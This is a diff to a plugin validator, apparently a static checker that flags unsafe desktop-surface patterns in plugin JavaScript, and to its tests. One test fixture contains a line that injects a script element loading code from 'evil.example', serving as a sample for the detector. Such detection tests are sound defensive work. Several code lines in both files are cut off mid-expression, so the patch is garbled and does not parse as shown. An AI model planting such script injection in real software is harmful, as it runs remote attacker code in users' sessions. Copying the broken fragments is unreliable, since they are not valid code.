diff --git a/hermes_cli/plugin_validate_desktop.py b/hermes_cli/plugin_validate_desktop.py
index 2ee8f9415e..b11d7c0c56 100644
--- a/hermes_cli/plugin_validate_desktop.py
+++ b/hermes_cli/plugin_validate_desktop.py
@@ -43,15 +43,21 @@ _COMMENT = re.compile(r"/\*.*?\*/|(?").source``) the constructor is
+# a string-builder and its literal keeps firing.
_REGEX_LITERAL = re.compile(r"(? str:
masked = _REGEX_LITERAL.sub(lambda m: " " * len(m.group(0)), source)
- return _REGEXP_CTOR_PATTERN.sub(lambda m: " " * len(m.group(0)), masked)
+ return _REGEXP_CTOR_MATCHER.sub(lambda m: " " * len(m.group(0)), masked)
def desktop_surface_findings(source: str) -> List[Tuple[str, int]]:
diff --git a/tests/hermes_cli/test_plugin_validate.py b/tests/hermes_cli/test_plugin_validate.py
index 5e3aea7c03..672c39129a 100644
--- a/tests/hermes_cli/test_plugin_validate.py
+++ b/tests/hermes_cli/test_plugin_validate.py
@@ -294,15 +294,20 @@ class TestDesktopSurface:
"const tag = document.createElement('script'); tag.src = 'https://evil.example/x.js'; document.head.append(tag)\n"
"const dyn = html.replace(new RegExp(\"'\n"
+ "el.innerHTML = new RegExp(\"\").source\n"
+ "if (new RegExp(\"